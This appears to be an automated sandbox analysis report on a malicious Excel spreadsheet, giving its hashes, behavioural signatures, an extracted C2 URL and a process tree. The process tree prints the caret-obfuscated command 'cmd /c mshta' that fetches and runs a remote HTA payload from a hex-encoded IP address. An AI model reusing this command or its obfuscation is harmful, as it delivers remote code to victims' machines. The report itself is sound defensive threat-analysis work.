Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20/11/2024, 09:03
Behavioral task
behavioral1
Sample
bf8a7821de4c9b3118146a154b21922ef769f2717793e8ed87da33761e013676.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
bf8a7821de4c9b3118146a154b21922ef769f2717793e8ed87da33761e013676.xls
Resource
win10v2004-20241007-en
General
-
Target
bf8a7821de4c9b3118146a154b21922ef769f2717793e8ed87da33761e013676.xls
-
Size
128KB
-
MD5
741914ecb613891de62b62f1b4a99e26
-
SHA1
83945e53a409e722182867530ce9feb762b177c4
-
SHA256
bf8a7821de4c9b3118146a154b21922ef769f2717793e8ed87da33761e013676
-
SHA512
31a8716fa12286c4cf6690a62a0fa69bd9db9178ed8a057927aceb3c2b94a0070c37cdefd284e22a916a6545cf8b3c62c8b1365763a4930a4531fc92f41591c3
-
SSDEEP
3072:Wuk3hbdlylKsgqopeJBWhZFGkE+cL2NdAxEvN8B/W6X1yxYovrepMUdQ6gSz4i:Fk3hbdlylKsgqopeJBWhZFVE+W2NdAmv
Malware Config
Extracted
http://185.7.214.7/cc.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2208 2400 cmd.exe 29 -
Blocklisted process makes network request 2 IoCs
flow pid Process 4 1972 mshta.exe 5 1972 mshta.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2400 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2400 EXCEL.EXE 2400 EXCEL.EXE 2400 EXCEL.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2400 wrote to memory of 2208 2400 EXCEL.EXE 30 PID 2400 wrote to memory of 2208 2400 EXCEL.EXE 30 PID 2400 wrote to memory of 2208 2400 EXCEL.EXE 30 PID 2400 wrote to memory of 2208 2400 EXCEL.EXE 30 PID 2208 wrote to memory of 1972 2208 cmd.exe 32 PID 2208 wrote to memory of 1972 2208 cmd.exe 32 PID 2208 wrote to memory of 1972 2208 cmd.exe 32 PID 2208 wrote to memory of 1972 2208 cmd.exe 32
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\bf8a7821de4c9b3118146a154b21922ef769f2717793e8ed87da33761e013676.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\SysWOW64\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/c^c.h^tm^l2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\SysWOW64\mshta.exemshta http://0xb907d607/cc.html3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1972
-
-